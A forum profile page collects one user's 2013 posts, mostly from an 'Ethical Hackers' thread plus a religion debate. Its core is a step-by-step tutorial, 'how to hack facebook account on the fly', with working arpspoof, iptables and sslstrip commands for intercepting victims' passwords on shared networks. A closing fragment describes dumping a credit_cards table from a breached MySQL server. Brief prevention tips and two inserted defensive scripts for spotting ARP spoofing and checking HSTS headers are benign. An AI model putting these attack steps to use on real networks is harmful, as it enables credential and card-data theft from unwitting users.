Justthinking's Posts


ProgrammingRe: Ethical Hackers by justthinking(op): 7:15pm On Sep 27, 2013
DonCrust: What's up guys... Just thinking i'm still waiting to hear from you
Xup bro. Sorry for not replying to you soon enough; my internet has been fucking up lately and I'm actually using my phone MB to send this message. I would like to paste the tutorial with pictures, and that is not something I can really do using mobile. I will get my internet up soon and I will post the tutorial. I'm really sorry, bro. Also, I have a tool you might all really be interested in; I will be posting the tutorial with yours very SOON. I'm really sorry.
IslamRe: Reactions To Westgate Murders By Muslim Scholars/imams by justthinking: 2:48pm On Sep 25, 2013
MacLovington: .

This is one thing I also don't understand about some Muslims. They seem very busy trying to be Biblical scholars and condemn the Bible. I personally know many people born into Muslim families who are now Christians and believe me many have awful things to say about Islam BUT
I am not swayed in anyway by whatever they say.

Because people change religions for different reasons. It is a personal thing between you and God.

I cannot take one person's testimony and ranting as ultimate proof of anything.

When I see even barely literate Muslims claiming how they know the original Bible and how it was all changed, it's quite surprising what the obsession is. Very common among Middle Eastern/Asian Muslims.

Yet they want to behead anyone who condemns the Koran. They want tolerance but are themselves intolerant.

My belief is that it takes God's mercy and favour to understand a Holy Book. It is not all literally what you see and read. If people can read a simple passage in an exam and cannot understand it, what about a Holy Book with more spiritual meaning than it seems?
It is quite funny that you picked my comment and neglected the comment posted by your Christian brother. The comment you quoted is a reply to the comment posted by our Christian brother. All I'm saying is that you quoted me out of context, just the same way most of you Christians quote the Holy Quran out of context. Just to tell you, I have lived with Christians all my life. I lived with them as roommates in school and we love each other so much that we call ourselves "brother from a different mother". I still live with a Christian right now also. Half of my best friends are Christian and we only bring up Islamic issues anytime we need to know something. And recently I made friends with someone online who is a Christian, and after a month of chatting the person told me she can't be my friend because I'm Muslim, so please don't play the tolerance card here.
ProgrammingRe: Ethical Hackers by justthinking(op): 10:45pm On Sep 24, 2013
@Slyr0x
Are you on any IRC (internet relay chat)
ProgrammingRe: Ethical Hackers by justthinking(op): 10:44pm On Sep 24, 2013
i think both of you are right but i dont think centrex has done anytin wrong. what i knw abt vulnerability is that if you find a vulneraability in a software or website you are to tell the company, after some month u can post it on exploit website e.g exploit-db.com, securityfocus e.t.c. so that programmers can protect themself. if u blame centrex for this act, then i think u shuld blame securityfocus that paste vulnerability and exploit-db.com too because they paste the vulnerability and the software and version that is vulnerable. all am saying am siding with centrex if TRULY they av report it to the son.gov.ng programmer or administrator.
IslamRe: Reactions To Westgate Murders By Muslim Scholars/imams by justthinking: 9:39pm On Sep 24, 2013
MacLovington: .

I have a copy of the Koran at home. From reading it I realised one big difference with the Bible.

In the Old Testament of the Bible the law of Moses provides for some violence to punish sinners. An eye for an eye, for example.
However, the New Testament focuses on forgiveness of sin. In fact LOVE is the greatest commandment we're told in it.

My conclusion is that the Koran as a whole has more in common with the Old Testament.

If the Bible was the Old Testament only, it would be quite conceivable for some Christian zealots to act like the Muslim fundamentalists are doing now, killing innocent people.
That is true to some extent, bro. But the thing is, the Bible, especially the New Testament, has been modified so many times to fit into a particular perspective, country, ideology, etc. If possible, try to watch this video:
https://www.youtube.com/watch?v=IYMKQKSV0bY.
IslamRe: Reactions To Westgate Murders By Muslim Scholars/imams by justthinking: 8:46pm On Sep 24, 2013
I have been reading the comments here silently, and this is what I noticed.
Observation
1. When the killing was going on, THEY said there is no Muslim here to condemn the killing. Muslims are terrorists.
2. When NL posted comments of Muslim clerics condemning the act, THEY said the Muslim clerics are not from well-reputed Muslim countries. So Muslims are terrorists.
3. When a Christian like David Cameron said the killing is not about religion, THEY said he is only interested in Arab money. So Muslims are terrorists.
4. When a Muslim tried to give an example of a Christian who is also involved in terror, THEY said he stopped going to church when he was 15. So Muslims are terrorists.
5. When a Muslim tried to give them an Islamic verse to back up his claim that these people are not doing what is in the Quran, THEY said it is a lie that Islam teaches and encourages killing of non-Muslims. So Muslims are terrorists.
Deduction and prediction
1. Most of the Christians here have already decided on what to believe before they even ask the question.
2. I won't be surprised if some Christians here don't really care about the killing but just want to use this avenue to talk bad about Islam.
3. Nothing will change their minds even when all the clerics in the world stand at the same time and condemn this evil act.

Advice
1. Muslims here should not abuse or argue with them, because doing that will yield nothing, because I don't really see this crisis ending soon. The people controlling this madness are actually getting the response they need, and they will keep pushing it until it leads to war (God forbid). We just have to learn how to deal with it and pray that Allah should help us stop this madness.
2. I would like the Christians here to try to read about the Quran themselves. Is it not funny that most Muslims here actually know the Bible more than some Christians here? It is because Muslims are truth seekers. They just don't want to believe in what some people tell us. We seek the truth. That is why we know these extremists are not Muslims.
3. ISLAM IS THE RELIGION OF PEACE
ProgrammingRe: Ethical Hackers by justthinking(op): 10:06pm On Sep 23, 2013
Slyr0x: ^^^

Are you guys really ethical hackers or Blackhats seeking attention?

If you are the former, you would realise a term such as "Responsible Disclosure" exist. .

Is it not ironic that the same "supposed researcher" who "declined to speak on the attack method due to public abuse" still came on a public fora like Nairaland to disclose that a certain vulnerability does exist on son.gov.ng ??

You unwittingly just made son.gov.ng a public target and whoever visits this thread with malicious intents would definitely want to have a go at it. .

Come on. .
You are right, but if truly they have reported this vulnerability and son.gov.ng didn't do anything about it, then I really don't think it is the fault of Centrex. Nigerian programmers need to start taking security issues seriously. I might be wrong sha ooo.
ProgrammingRe: Ethical Hackers by justthinking(op): 10:00pm On Sep 23, 2013
gr3yb4ck: gr3yb4ck w!ll l!K3 T0 M33T JUST_THINKING
Here I am, boss. You can send me your e-mail for us to chat better, and you can also paste your question here, boss.
ProgrammingRe: Ethical Hackers by justthinking(op): 9:59pm On Sep 23, 2013
DonCrust: just_thinking where have you been? I'm trying to set up a lab. I've already started downloading BT5R3 - Gnome and as soon as its done, I'll need you to walk me through the process.

Hope you're not on honeymoonhuh
Lol. I'm not on honeymoon, boss. OK, no problem. Try to download Sun VirtualBox along. You can download it from C:\Users\arotob\Downloads\Programs\VirtualBox-4.2.18-88781-Win.exe . When you have the required software, I will explain how to set it up.
ProgrammingRe: Ethical Hackers by justthinking(op): 4:32pm On Sep 19, 2013
curiouslad: @ just_thinking
i think i found you

{"country": "Nigeria", "city": "Ibadan", "prefix": "41.220.69.0/24", "organization": "VCG-AS VGC Communication Ltd.", "latitude": 7.3878, "ip": "41.220.69.98", "region": "Oyo", "hostname": "41.220.69.98.vgccl.net", "asn": "AS29465", "longitude": 3.8964} grin grin
blah blah blah
can you shoot me an {barmmie} (at) {gmail}.com
dude are u on any irc
ProgrammingRe: Ethical Hackers by justthinking(op): 4:20pm On Sep 19, 2013
curiouslad: @ just_thinking
i think i found you

{"country": "Nigeria", "city": "Ibadan", "prefix": "41.220.69.0/24", "organization": "VCG-AS VGC Communication Ltd.", "latitude": 7.3878, "ip": "41.220.69.98", "region": "Oyo", "hostname": "41.220.69.98.vgccl.net", "asn": "AS29465", "longitude": 3.8964} grin grin
blah blah blah
can you shoot me an {barmmie} (at) {gmail}.com
Lol. You tried sha. But I'm not in Ibadan, I'm in Lagos. One thing is I never really trust geolocation of Nigerian IP addresses. It is mostly false. The only true thing is the country part. Which method did you use to get my IP address?
ProgrammingRe: Ethical Hackers by justthinking(op): 11:13pm On Sep 18, 2013
Slyr0x: Which one is that?
ProgrammingRe: Ethical Hackers by justthinking(op): 11:12pm On Sep 18, 2013
Slyr0x: Which one is that?
Kioptrix level 1 virtual hard disk. Never started playing it though.
ProgrammingRe: Ethical Hackers by justthinking(op): 11:06pm On Sep 18, 2013
Slyr0x: Which one is that?
Kioptrix v1
ProgrammingRe: Ethical Hackers by justthinking(op): 5:18pm On Sep 18, 2013
Just downloaded level one.
ProgrammingRe: Ethical Hackers by justthinking(op): 4:48pm On Sep 18, 2013
Slyr0x: Kali Linux is currently the most advanced and versatile penetration testing suite. .equally maintained and funded by Offensive Security (the creators of Backtrack). .

Just see Kali Linux as an advance backtrack. .

Also, you could try your hands on some "vulnerable by design OS". .

One of such is Kioptrix, a Pentest lab for security enthusiasts to legally try out their skills with the aim to completely compromise the machine.

I made a video sometime last year on it (find below)


https://www.youtube.com/watch?v=2_tfyF_7KWk

The full walk-through is here

There are other fantastic vulnerable OS (they are all ISO Images) you could try your hands on here https://pentesterlab.com/exercises/

Lemme know what you think. .
That is cool. I will try it out.
ProgrammingRe: Ethical Hackers by justthinking(op): 4:01pm On Sep 18, 2013
Slyr0x: Nice. .You should upgrade your Bt5 to Kali linux wink
Is it better than BT?
ProgrammingRe: Ethical Hackers by justthinking(op): 3:12pm On Sep 18, 2013
My Virtual Lab


ProgrammingRe: Ethical Hackers by justthinking(op): 2:06pm On Sep 18, 2013
Slyr0x: ^^^I believe people would appreciate it more if one of us could setup a virtual lab for practicals as against the theory here
I have a virtual lab I'm using. I use Sun VirtualBox. I have Windows XP installed on one, BT5r1 installed on another, and my Windows 7, which is my host. I networked the three together and that is what I'm using for my testing. Believe, the hack above is tested and trusted.
ProgrammingRe: Ethical Hackers by justthinking(op): 11:43am On Sep 18, 2013
The URL changed into HTTP. :-)

4. After SSL Strip has captured enough data, stop ARPSpoof and SSL Strip by hitting CTRL + C. After you stop it, the whole network will be down and cannot be accessed for a while (it shouldn't take a long time); this can happen because ARPSpoof didn't automatically repopulate the ARP tables with the router's proper MAC address.

5. Inside the SSL Strip folder there will be a new file created, "sslstrip.log", that stores all the information captured over the HTTP protocol and even HTTPS. Just take a look at the file using your favorite text editor. The picture below shows the content of my sslstrip.log, which captured the victim's data when they opened https://mail.live.com.

You can see the plain data of username and password there.



Prevention of SSL Strip Attack

1. If you are on a public network (internet cafe, unsecured hotspot, etc.), minimize logging in to your personal accounts.

2. Use SSH Tunneling (You can see the tutorial here).

3. Keep your eyes open.

This fake URL address [image] is different from this one [image].
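
The prevention list in the post above is all client-side; the server-side counterpart is HTTP Strict Transport Security (RFC 6797), which tells a browser that has already visited a site to refuse plain HTTP for it, so there is no HTTP link left to rewrite. The following is an added example, not part of the original post, that audits response headers for a usable policy; the 180-day threshold, the sample responses and the function names are assumptions.

```python
"""Audit a response for an HSTS policy that blunts HTTPS stripping."""

MIN_MAX_AGE = 15552000  # 180 days: assumed audit threshold, not from the post


def parse_hsts(value):
    """Parse a Strict-Transport-Security value into {directive: value}.

    Returns None when the header is unusable: a directive is repeated, or
    max-age is missing or not a plain non-negative integer (RFC 6797, 6.1).
    """
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, raw = part.partition("=")
        name = name.strip().lower()      # directive names are case-insensitive
        raw = raw.strip().strip('"')     # values may be quoted-strings
        if name in directives:
            return None
        directives[name] = raw
    age = directives.get("max-age", "")
    if not (age.isascii() and age.isdigit()):
        return None
    directives["max-age"] = int(age)
    return directives


def assess(scheme, headers):
    """Return a short verdict for one response (scheme plus header dict)."""
    lowered = {k.lower(): v for k, v in headers.items()}
    value = lowered.get("strict-transport-security")
    if scheme != "https":
        # Browsers ignore HSTS received over plain HTTP, because anyone in
        # the path could forge or remove it there.
        return "ignored-over-http" if value else "no-policy"
    if value is None:
        return "no-policy"
    policy = parse_hsts(value)
    if policy is None:
        return "invalid"
    if policy["max-age"] == 0:
        return "policy-cleared"          # max-age=0 makes the browser forget the host
    if policy["max-age"] < MIN_MAX_AGE:
        return "short-lived"
    return "ok+subdomains" if "includesubdomains" in policy else "ok"


# Constructed sample responses, not real measurements.
SAMPLES = [
    ("https", {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"}),
    ("https", {"strict-transport-security": 'MAX-AGE="63072000"'}),
    ("https", {"Strict-Transport-Security": "max-age=300"}),
    ("https", {"Strict-Transport-Security": "max-age=0"}),
    ("https", {"Strict-Transport-Security": "includeSubDomains"}),
    ("https", {"Content-Type": "text/html"}),
    ("http", {"Strict-Transport-Security": "max-age=31536000"}),
]

if __name__ == "__main__":
    for scheme, headers in SAMPLES:
        print(scheme, headers, "->", assess(scheme, headers))
```

HSTS only protects visits after the browser has seen the policy once over HTTPS, so a first visit on a hostile network is still exposed unless the site is on the browser's preload list.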

ProgrammingRe: Ethical Hackers by justthinking(op): 11:36am On Sep 18, 2013
I would like to share how to hack facebook account on the fly


Some people ask, "Are you sure SSL (Secure Socket Layer) port 443 can be hacked and we know the password sent over the network??" ... how to break SSL protection using sslstrip?

What is SSL?

(pronounced as separate letters) Short for Secure Sockets Layer, a protocol developed by Netscape for transmitting private documents via the Internet. SSL uses a cryptographic system that uses two keys to encrypt data − a public key known to everyone and a private or secret key known only to the recipient of the message. Both Netscape Navigator and Internet Explorer support SSL, and many Web sites use the protocol to obtain confidential user information, such as credit card numbers. By convention, URLs that require an SSL connection start with https: instead of http:.
Another protocol for transmitting data securely over the World Wide Web is Secure HTTP (S-HTTP). Whereas SSL creates a secure connection between a client and a server, over which any amount of data can be sent securely, S-HTTP is designed to transmit individual messages securely. SSL and S-HTTP, therefore, can be seen as complementary rather than competing technologies. Both protocols have been approved by the Internet Engineering Task Force (IETF) as a standard.
When we try to break the encryption, it's a little bit hard to break, but here in this tutorial I will explain how to break the SSL encryption without breaking the SSL encryption, using a Man in the Middle Attack :-).

Man in the Middle Attack

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point, can insert himself as a man-in-the-middle).
A man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to the satisfaction of the other — it is an attack on mutual authentication (or lack thereof). Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, SSL can authenticate one or both parties using a mutually trusted certification authority.



Requirement :
1. Linux OS

2. Arpspoof

3. IPTables

4. SSLStrip

5. NetStat

All of these requirements may have dependencies on other packages. I suggest you use Backtrack Linux to make this tutorial easier, because all of the required packages are already installed inside Backtrack Linux (except SSLStrip).

Perform the Attack – Man in the Middle Attack

1. Set your Linux box so that it can forward every incoming port (enable port forwarding).

echo ’1’ > /proc/sys/net/ipv4/ip_forward

This code will let your Linux Backtrack have the ability to forward every packet that was not intended for your machine.

2. Know your network gateway
netstat -nr

For example, I already know that my gateway address is 192.168.8.8

3. Use ARP spoof to perform Man in the Middle Attack

arpspoof -i eth0 192.168.8.8

a. Change "eth0" to your network card that currently connected to the network. Usually it is eth0 or wlan0.

b. Change "192.168.8.8" to your network default gateway.

c. In this tutorial I use arpspoof on the entire network. Be careful if your network has a large number of users connected to it, because it will crash your network and bring your network down.

SSL Strip

Created by Moxie Marlinspike, who provides a demonstration of the HTTPS stripping attacks that he presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. -Taken from author website-

This all happens on the fly, and is practically invisible to users. The only way to notice is by checking the URL in the address bar: where normally it would display HTTPS, it will now display HTTP instead.

Install SSL Strip (optional)

1. Download SSL Strip

2. tar zxvf sslstrip-0.9.tar.gz

3. cd sslstrip-0.9

4. python setup.py install

Executing SSL Strip Attack

1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2. After setting up iptables, the next step is to redirect all network HTTP traffic through our computer using ARPSpoof (don't forget to enable IP forwarding)

echo ’1’ > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.8.8

3. When everything is running well, you will see ARPSpoof capturing network traffic. The next step is to start SSL Strip by opening a new terminal (CTRL+ALT+T)

sslstrip -l 8080
"-l" tells the system to listen on specified port.

The above picture shows that SSL Strip is already running and waiting for the victim to open an SSL URL such as (https://mail.google.com; https://mail.yahoo.com; etc.)

As a victim I will try to open https://mail.live.com. When I open the page, what I see looks like the picture below.
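
A defender's view of the ARP spoofing step in the post above, as an added example that is not part of the original post: poisoning shows up in a host's ARP cache as the gateway IP suddenly resolving to a different MAC, usually one that another LAN host already owns. The snapshots use the Linux /proc/net/arp layout with the post's gateway 192.168.8.8; the MAC addresses, the other IPs and the function names are constructed for illustration.

```python
"""Spot ARP-cache poisoning by comparing two snapshots of /proc/net/arp."""
from collections import defaultdict

GATEWAY_IP = "192.168.8.8"  # gateway address used in the post

# Constructed sample data in Linux /proc/net/arp layout (MACs are made up).
BASELINE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.8.8      0x1         0x2         00:1a:2b:3c:4d:5e     *        eth0
192.168.8.20     0x1         0x2         08:00:27:aa:bb:01     *        eth0
192.168.8.90     0x1         0x2         08:00:27:aa:bb:02     *        eth0
"""
POISONED = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.8.8      0x1         0x2         08:00:27:aa:bb:02     *        eth0
192.168.8.20     0x1         0x2         08:00:27:aa:bb:01     *        eth0
192.168.8.90     0x1         0x2         08:00:27:aa:bb:02     *        eth0
192.168.8.77     0x1         0x0         00:00:00:00:00:00     *        eth0
"""

ATF_COM = 0x2  # "entry complete" flag; incomplete entries carry no usable MAC


def parse_arp_table(text):
    """Return {ip: mac} for complete entries; skip the header and bad rows."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, _device = fields
        try:
            complete = int(flags, 16) & ATF_COM
        except ValueError:
            continue
        if complete:
            table[ip] = mac.lower()
    return table


def find_anomalies(baseline, current, gateway_ip):
    """Compare two parsed tables and list signs of a poisoned cache."""
    findings = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        findings.append(("gateway-mac-changed", gateway_ip, old, new))
    # One MAC answering for several IPs: the spoofing host appears under
    # its own address and under the address it is impersonating.
    owners = defaultdict(list)
    for ip, mac in current.items():
        owners[mac].append(ip)
    for mac, ips in sorted(owners.items()):
        if len(ips) > 1:
            findings.append(("mac-shared", mac, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    before = parse_arp_table(BASELINE)
    after = parse_arp_table(POISONED)
    for finding in find_anomalies(before, after, GATEWAY_IP):
        print(finding)
```

A shared MAC can be legitimate (proxy ARP, a host with several addresses), so treat `mac-shared` as a lead to investigate rather than proof; a static ARP entry for the gateway removes the exposure on a single host.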

ProgrammingRe: Ethical Hackers by justthinking(op):
centrex: Centrex Lab is a cyber security company based in Abuja Nigeria , we deal more on cyber intelligence,Black Ops Project and offensive security / Ethical hacking... we are active players on cyber security seminars also, we have train a whole lot of people including FUTMINA CYBER SECURITY DEPT.... you can visit our website on http://centrexethicalab.com/ or google Centrex Ethical Lab to read more about us.... Every September of a given year, we celebrate our cyber security month, where we give a whole lot of stuff to Nigerian citizen to encourage them on the need to be safe online
That is cool. Keep doing your good job.
ProgrammingRe: Ethical Hackers by justthinking(op): 9:16pm On Sep 15, 2013
megatran: is there a way to use backtrack on vmware to crack wep key wifi passwords..i have bt5r3 installed on my pc but it doesnot find an interface when i scan for wireless networks..i am also thinking if it were possible to have to boot the backtrack from windows and run it like a normal operating system, i dont know if that will be possible..and lastly i would want to know how i can crack wep and wpa-psk wifi using windows operating system..thanks for ur support
There is no way of connecting VMware to your wireless card interface (at least that I know of), which leaves two options: you either buy an external USB wireless card like D-Link, or you install BT5 on your system as a normal OS. As for trying to crack WPA using Windows, you should try to learn about aircrack, but I'm not sure if it is entirely stable on Windows.
ProgrammingRe: Ethical Hackers by justthinking(op): 12:13pm On Sep 15, 2013
nasonaso: @ just thinking am new to sql u r a bad guy respect
Thank you, boss. You can check a beginner tutorial for SQL injection here: http://thecybersaviours.com/sql-injection-for-beginners
ProgrammingRe: Ethical Hackers by justthinking(op): 10:19am On Sep 15, 2013
megatran: just thinking...cant havij or acunetix actually do the job of metasploit and although i got way confused by ur advance way of begining the topic am sure i can go around getting a newbie lecture. is metasploit used in windows or linux...nice tutorial by the way
I think they are two different software. Metasploit is an exploitation tool, probably the best exploitation tool we have. It is used for breaking systems, not websites. If you look at the tutorial above, we are attacking a MySQL server, not a website that uses a MySQL database. We didn't do any MySQL injection. All we did was try to hack the MySQL username and password, and once we have it we can analyze the tables in the MySQL. What I'm saying is that we use Metasploit to hack the MySQL server directly, while software like Havij uses the website to hack the MySQL server; that is what we call MySQL injection. With this you don't need to hack the MySQL password. All you just have to do is use some programming error to hack the MySQL server. I wish to post a MySQL injection tutorial soon. Thanks for the question, bro. And also, there is Metasploit for Windows, but I will strongly advise you to get Backtrack OS. It is better than using Metasploit on Windows because there are some commands you can't use on Windows except you have Cygwin installed on your Windows OS. And also some Windows can block some protocols when trying to connect, and that will hinder the function of Metasploit. If you don't mind me asking, where are you staying?
ProgrammingRe: Ethical Hackers by justthinking(op): 10:08am On Sep 15, 2013
DonCrust: Nice work @just_thinking. I remember those days when i use to do sql injection, brute force and deface cpanel, penetrating ebay through back door... At times I wish i didn't stop
Wow, that's great, boss. You can still share some hacking tips with us naw.
ProgrammingRe: Ethical Hackers by justthinking(op): 10:05am On Sep 15, 2013
kiddie: u on whatsapp justthinking
Nope. I hardly chat, but I'm on 2go.
ProgrammingRe: Ethical Hackers by justthinking(op): 1:30pm On Sep 14, 2013
Djtm: thanks.
You are welcome.
ProgrammingRe: Ethical Hackers by justthinking(op): 12:09pm On Sep 14, 2013
Djtm: What??! So how do you prevent that?
Simple: use a very long password. That doesn't say it won't be hackable, but it will make it difficult to. And one thing you should remember about security is that nothing is 100% secure.
ProgrammingRe: Ethical Hackers by justthinking(op): 11:03am On Sep 14, 2013
The interesting table here is the credit_cards, so we would like to see the contents of this table. We will change database with the command use <dbname> and we will execute the command show * from credit_cards;

Now we have all the credit cards details from users and all the accounts and passwords from the database.
